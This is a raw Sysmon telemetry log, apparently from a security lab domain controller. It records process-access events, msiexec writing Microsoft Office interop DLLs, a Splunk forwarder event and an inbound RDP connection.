14:56:02.782{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.782{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.782{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000072510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.766{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\YUPJOKKT\Policy.11.0.Microsoft.Vbe.Interop.dll2021-04-20 14:56:02.766 11241100x800000000000000072509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.766{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\3ATTNG0U\Microsoft.Vbe.Interop.dll2021-04-20 14:56:02.766 11241100x800000000000000072508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.766{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\XXRCII3K\Policy.14.0.Microsoft.Vbe.Interop.dll2021-04-20 14:56:02.766 11241100x800000000000000072507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\FDYHGR3F\Policy.12.0.Microsoft.Vbe.Interop.dll2021-04-20 14:56:02.750 11241100x800000000000000072506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\J54ITDUE\stdole.dll2021-04-20 14:56:02.750 11241100x800000000000000072505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\stdole.dll2021-04-20 14:56:02.750 11241100x800000000000000072504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\S6FSC7KF\Policy.11.0.Microsoft.Office.Interop.Publisher.dll2021-04-20 14:56:02.750 11241100x800000000000000072503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.735{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\6ZQOGJE7\Policy.14.0.Microsoft.Office.Interop.Publisher.dll2021-04-20 14:56:02.735 11241100x800000000000000072502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.735{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\S8EB1J3A\Policy.12.0.Microsoft.Office.Interop.Publisher.dll2021-04-20 14:56:02.735 11241100x800000000000000072501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\CQ0SSVLD\Microsoft.Office.Interop.Publisher.dll2021-04-20 14:56:02.719 11241100x800000000000000072500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\YUC8FY0O\Policy.11.0.Microsoft.Office.Interop.PowerPoint.dll2021-04-20 14:56:02.719 11241100x800000000000000072499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.704{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\CWGVCD0Y\Microsoft.Office.Interop.PowerPoint.dll2021-04-20 14:56:02.704 11241100x800000000000000072498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.704{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\RQUHKC5H\Policy.14.0.Microsoft.Office.Interop.PowerPoint.dll2021-04-20 14:56:02.704 11241100x800000000000000072497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.704{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\URHXZCWA\Policy.12.0.Microsoft.Office.Interop.PowerPoint.dll2021-04-20 14:56:02.704 11241100x800000000000000072496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.704{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\B3RCNMHG\Policy.11.0.Microsoft.Office.Interop.Outlook.dll2021-04-20 14:56:02.704 11241100x800000000000000072495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.688{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\WKX14JH1\Policy.14.0.Microsoft.Office.Interop.Outlook.dll2021-04-20 14:56:02.688 11241100x800000000000000072494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.688{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\24GWGLWP\Policy.12.0.Microsoft.Office.Interop.Outlook.dll2021-04-20 14:56:02.688 11241100x800000000000000072493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\T1H01E1Y\Microsoft.Office.Interop.Outlook.dll2021-04-20 14:56:02.672 11241100x800000000000000072492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\JMV6XVWJ\Microsoft.Office.Interop.OneNote.dll2021-04-20 14:56:02.672 11241100x800000000000000072491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\NBOELLNF\Microsoft.Office.Interop.OneNote.dll2021-04-20 14:56:02.657 11241100x800000000000000072490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\GOV310VC\Policy.14.0.Microsoft.Office.Interop.OneNote.dll2021-04-20 14:56:02.657 11241100x800000000000000072489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\6CXDHZX6\Policy.11.0.Microsoft.Office.Interop.OutlookViewCtl.dll2021-04-20 14:56:02.657 11241100x800000000000000072488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\VL9BZP5W\Microsoft.Office.Interop.OutlookViewCtl.dll2021-04-20 14:56:02.657 11241100x800000000000000072487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\BZ6JDLSL\Policy.11.0.Office.dll2021-04-20 14:56:02.641 11241100x800000000000000072486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\EKHX5XSH\OFFICE.DLL2021-04-20 14:56:02.641 11241100x800000000000000072485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\EG9F4JNR\Policy.14.0.Office.dll2021-04-20 14:56:02.625 11241100x800000000000000072484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\JY8FOIQ2\Policy.12.0.Office.dll2021-04-20 14:56:02.625 11241100x800000000000000072483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\74WPBO8V\Policy.14.0.Microsoft.Office.Interop.OutlookViewCtl.dll2021-04-20 14:56:02.625 11241100x800000000000000072482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\K2CTJHRO\Policy.12.0.Microsoft.Office.Interop.OutlookViewCtl.dll2021-04-20 14:56:02.625 11241100x800000000000000072481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.610{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.Office.Tools.v9.0.dll2021-04-20 14:56:02.610 11241100x800000000000000072480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.610{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\NGBOBBRY\Microsoft.Office.Tools.v9.0.dll2021-04-20 14:56:02.610 11241100x800000000000000072479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.610{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\QUCZIDG2\Microsoft.VisualStudio.Tools.Office.ContainerControl.v10.0.dll2021-04-20 14:56:02.610 11241100x800000000000000072478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.610{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll2021-04-20 14:56:02.610 11241100x800000000000000072477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\4BOXFPK1\Microsoft.VisualStudio.Tools.Applications.ServerDocument.v9.0.dll2021-04-20 14:56:02.594 11241100x800000000000000072476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\DDXZSEXV\Policy.14.0.Microsoft.Office.Interop.SmartTag.dll2021-04-20 14:56:02.594 11241100x800000000000000072475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\YKXQD4UE\Policy.12.0.Microsoft.Office.Interop.SmartTag.dll2021-04-20 14:56:02.594 11241100x800000000000000072474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\S6Z9EEDA\Policy.11.0.Microsoft.Office.Interop.SmartTag.dll2021-04-20 14:56:02.594 11241100x800000000000000072473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.579{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\DGXS3KH9\Microsoft.Office.Interop.SmartTag.dll2021-04-20 14:56:02.579 11241100x800000000000000072472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.579{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\MNFYRA1C\msdatasrc.dll2021-04-20 14:56:02.579 11241100x800000000000000072471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.579{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\CUX8T1Q0\MSCOMCTL.DLL2021-04-20 14:56:02.579 11241100x800000000000000072470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.563{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\MTTR12JE\Microsoft.stdformat.dll2021-04-20 14:56:02.563 354300x800000000000000072469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.953{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-6928-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000072468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.454{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\KKZYHJIT\Microsoft.mshtml.dll2021-04-20 14:56:02.454 11241100x800000000000000072467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.454{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\63668HY2\Microsoft.VisualStudio.Tools.Office.Word.AddInProxy.v9.0.dll2021-04-20 14:56:02.454 11241100x800000000000000072466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll2021-04-20 14:56:02.438 11241100x800000000000000072465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\TJ20NR34\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll2021-04-20 14:56:02.438 11241100x800000000000000072464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\CR7TNRM4\Microsoft.VisualStudio.Tools.Office.Excel.AddInProxy.v9.0.dll2021-04-20 14:56:02.438 11241100x800000000000000072463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll2021-04-20 14:56:02.438 11241100x800000000000000072462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\IEK8BTDE\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll2021-04-20 14:56:02.438 11241100x800000000000000072461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll2021-04-20 14:56:02.422 11241100x800000000000000072460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\CGMNW9CI\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll2021-04-20 14:56:02.422 11241100x800000000000000072459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll2021-04-20 14:56:02.422 11241100x800000000000000072458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\EMT3HHRO\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll2021-04-20 14:56:02.422 11241100x800000000000000072457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll2021-04-20 14:56:02.422 11241100x800000000000000072456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\Y8UQDCEU\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll2021-04-20 14:56:02.407 11241100x800000000000000072455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll2021-04-20 14:56:02.407 11241100x800000000000000072454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\OCP578S9\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll2021-04-20 14:56:02.407 11241100x800000000000000072453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll2021-04-20 14:56:02.407 11241100x800000000000000072452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\GLO5ZG1G\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll2021-04-20 14:56:02.391 11241100x800000000000000072451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll2021-04-20 14:56:02.391 11241100x800000000000000072450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\HCEVAGHF\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll2021-04-20 14:56:02.391 11241100x800000000000000072449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll2021-04-20 14:56:02.391 11241100x800000000000000072448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll2021-04-20 14:56:02.391 11241100x800000000000000072447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll2021-04-20 14:56:02.391 11241100x800000000000000072446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.376{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\D1J3VG2Y\Policy.11.0.Microsoft.Office.Interop.Graph.dll2021-04-20 14:56:02.376 11241100x800000000000000072445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.376{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\C24FAKX6\Microsoft.Office.Interop.Graph.dll2021-04-20 14:56:02.376 10341000x800000000000000072444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.376{A7A01FEF-EB82-607E-9F0B-00000000BB01}4816712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000072443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.376{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\T8SEXA2M\Policy.14.0.Microsoft.Office.Interop.Graph.dll2021-04-20 14:56:02.376 11241100x800000000000000072442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.360{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\68ZUDI47\Policy.12.0.Microsoft.Office.Interop.Graph.dll2021-04-20 14:56:02.360 11241100x800000000000000072441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.360{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\4B0EVTPW\Microsoft.Vbe.Interop.Forms.dll2021-04-20 14:56:02.360 11241100x800000000000000072440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.360{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOMessageProvider.dll2021-04-20 14:56:02.360 11241100x800000000000000072439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.360{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOMessageProvider.dll2021-04-20 14:56:02.360 